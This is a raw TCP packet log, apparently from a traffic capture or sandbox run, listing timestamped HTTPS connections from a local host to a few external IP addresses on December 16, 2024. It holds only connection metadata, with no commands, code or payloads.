                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.392951012 CET49959443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.393022060 CET4434995913.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.393122911 CET49959443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.393188000 CET49959443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.393207073 CET4434995913.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.527098894 CET4434996113.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.527345896 CET49961443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.527386904 CET4434996113.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.528280973 CET4434996113.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.528351068 CET49961443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.528628111 CET49961443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.528692961 CET4434996113.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.528795958 CET49961443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.528810024 CET4434996113.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.528865099 CET49961443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.528877974 CET49961443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.528877974 CET49961443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.528893948 CET4434996113.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.542423964 CET49961443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.542459965 CET4434996113.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.587805986 CET4434995513.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.587924004 CET4434995513.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.588037014 CET49955443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.588757992 CET49955443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.588782072 CET4434995513.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.665014982 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.665107965 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.665167093 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.666275024 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.666284084 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.912636042 CET4434995913.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.912885904 CET4434995913.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.912945986 CET49959443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.913626909 CET49959443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.913664103 CET4434995913.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.958647966 CET4434996213.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.958987951 CET49962443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.959017992 CET4434996213.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.959897995 CET4434996213.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.959969997 CET49962443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.960280895 CET49962443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.960334063 CET4434996213.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.960449934 CET49962443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.960494995 CET49962443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.960510969 CET4434996213.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.011121988 CET49962443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.069931030 CET4434996313.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.072854042 CET49963443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.072907925 CET4434996313.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.074491978 CET4434996313.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.074567080 CET49963443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.075263023 CET49963443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.075380087 CET4434996313.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.075525045 CET49963443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.075583935 CET49963443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.075606108 CET4434996313.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.124162912 CET49963443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.270165920 CET4434996113.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.270252943 CET4434996113.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.270313978 CET49961443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.271348953 CET49961443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.271368980 CET4434996113.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.385565042 CET49971443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.385605097 CET44349971116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.385734081 CET49971443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.385966063 CET49971443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.385978937 CET44349971116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.539920092 CET4434996213.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.540005922 CET4434996213.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.540052891 CET49962443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.561990023 CET49962443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.562036037 CET4434996213.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.817131042 CET44349968116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.817229033 CET49968443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.817801952 CET49968443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.817812920 CET44349968116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.823978901 CET49968443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.823992014 CET44349968116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.824009895 CET49968443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.824017048 CET44349968116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.953586102 CET4434996313.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.953810930 CET4434996313.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.954441071 CET49963443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.954499006 CET4434996313.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.954519033 CET49963443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:27.954549074 CET49963443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:28.820417881 CET44349971116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:28.820545912 CET49971443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:28.821089029 CET49971443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:28.821099997 CET44349971116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:28.827653885 CET49971443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:28.827661037 CET44349971116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:28.827683926 CET49971443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:28.827691078 CET44349971116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:28.880925894 CET44349968116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:28.880994081 CET44349968116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:28.881040096 CET49968443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:28.881072044 CET49968443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:28.881970882 CET49968443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:28.881989002 CET44349968116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:29.405421019 CET49978443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:29.405469894 CET44349978116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:29.405544996 CET49978443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:29.405977011 CET49978443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:29.405988932 CET44349978116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:29.856718063 CET44349971116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:29.856806993 CET44349971116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:29.856826067 CET49971443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:29.856884003 CET49971443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:29.857733011 CET49971443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:29.857760906 CET44349971116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:30.413628101 CET49979443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:30.413685083 CET44349979116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:30.413748980 CET49979443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:30.414042950 CET49979443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:30.414053917 CET44349979116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:30.803005934 CET44349978116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:30.803132057 CET49978443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:30.803599119 CET49978443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:30.803608894 CET44349978116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:30.810071945 CET49978443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:30.810077906 CET44349978116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:30.810147047 CET49978443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:30.810152054 CET44349978116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:31.552654982 CET4434987123.33.40.139192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:31.552737951 CET4434987123.33.40.139192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:31.552830935 CET49871443192.168.2.723.33.40.139
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:31.820372105 CET44349979116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:31.820472956 CET49979443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:31.820970058 CET49979443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:31.820981026 CET44349979116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:31.827068090 CET49979443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:31.827085018 CET44349979116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:31.827124119 CET49979443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:31.827136993 CET44349979116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:31.853904963 CET44349978116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:31.853996992 CET44349978116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:31.854084969 CET49978443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:31.854135036 CET49978443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:31.855372906 CET49978443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:31.855396032 CET44349978116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:32.437840939 CET49985443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:32.437901020 CET44349985116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:32.438002110 CET49985443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:32.438215971 CET49985443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:32.438225985 CET44349985116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:32.741094112 CET4434987823.219.82.75192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:32.741189003 CET4434987823.219.82.75192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:32.741425991 CET49878443192.168.2.723.219.82.75
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:32.859308958 CET44349979116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:32.859396935 CET44349979116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:32.859477997 CET49979443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:32.860265970 CET49979443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:32.860280037 CET44349979116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:33.444875002 CET49991443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:33.444932938 CET44349991116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:33.445024967 CET49991443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:33.445245981 CET49991443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:33.445257902 CET44349991116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:33.917977095 CET44349985116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:33.918121099 CET49985443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:33.918586016 CET49985443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:33.918596983 CET44349985116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:33.924911976 CET49985443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:33.924917936 CET44349985116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:33.924968958 CET49985443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:33.924974918 CET44349985116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:34.909573078 CET44349991116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:34.909682989 CET49991443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:34.910022974 CET49991443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:34.910034895 CET44349991116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:34.911650896 CET49991443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:34.911659002 CET44349991116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:34.911689043 CET49991443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:34.911696911 CET44349991116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:34.961838007 CET44349985116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:34.961910963 CET49985443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:34.961935043 CET44349985116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:34.961967945 CET44349985116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:34.961987972 CET49985443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:34.962022066 CET49985443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:34.963073969 CET49985443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:34.963095903 CET44349985116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:35.467147112 CET49995443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:35.467200994 CET44349995116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:35.467336893 CET49995443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:35.467540979 CET49995443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:35.467557907 CET44349995116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:35.949903965 CET44349991116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:35.950052977 CET49991443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:35.950082064 CET44349991116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:35.950110912 CET44349991116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:35.950131893 CET49991443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:35.950160027 CET49991443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:35.951102018 CET49991443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:35.951117992 CET44349991116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:36.482258081 CET49998443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:36.482297897 CET44349998116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:36.482382059 CET49998443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:36.482589006 CET49998443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:36.482600927 CET44349998116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:36.644922018 CET4434990423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:36.645014048 CET4434990423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:36.645097971 CET49904443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:36.873481035 CET44349995116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:36.873656988 CET49995443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:36.883718014 CET49995443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:36.883728981 CET44349995116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:36.947455883 CET49995443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:36.947474957 CET44349995116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:36.947498083 CET49995443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:36.947504997 CET44349995116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:37.007297039 CET4434990923.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:37.007378101 CET4434990923.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:37.007438898 CET49909443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:37.893424034 CET44349998116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:37.893498898 CET49998443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:37.894049883 CET49998443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:37.894059896 CET44349998116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:37.895768881 CET49998443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:37.895773888 CET44349998116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:37.895802021 CET49998443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:37.895807028 CET44349998116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:37.915290117 CET44349995116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:37.915493965 CET44349995116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:37.915647030 CET49995443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:37.917536974 CET49995443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:37.917582035 CET44349995116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:38.513077021 CET50004443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:38.513127089 CET44350004116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:38.513237953 CET50004443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:38.513586044 CET50004443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:38.513597965 CET44350004116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:38.936443090 CET44349998116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:38.936629057 CET44349998116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:38.936713934 CET49998443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:38.937679052 CET49998443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:38.937700987 CET44349998116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:39.523150921 CET50008443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:39.523185968 CET44350008116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:39.523251057 CET50008443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:39.523500919 CET50008443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:39.523508072 CET44350008116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:39.916399002 CET44350004116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:39.916532993 CET50004443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:39.917093039 CET50004443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:39.917104959 CET44350004116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:39.918690920 CET50004443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:39.918704033 CET44350004116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:39.918725014 CET50004443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:39.918732882 CET44350004116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:40.491933107 CET4434993323.33.40.153192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:40.492137909 CET4434993323.33.40.153192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:40.492264032 CET49933443192.168.2.723.33.40.153
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:40.497409105 CET4434993423.33.40.153192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:40.497487068 CET4434993423.33.40.153192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:40.497538090 CET49934443192.168.2.723.33.40.153
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:40.925530910 CET44350008116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:40.925664902 CET50008443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:40.926243067 CET50008443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:40.926255941 CET44350008116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:40.927895069 CET50008443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:40.927900076 CET44350008116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:40.927936077 CET50008443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:40.927943945 CET44350008116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:40.961658955 CET44350004116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:40.961749077 CET44350004116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:40.961750984 CET50004443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:40.961796045 CET50004443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:40.962666035 CET50004443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:40.962693930 CET44350004116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:41.531909943 CET50014443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:41.531948090 CET44350014116.203.12.114192.168.2.7
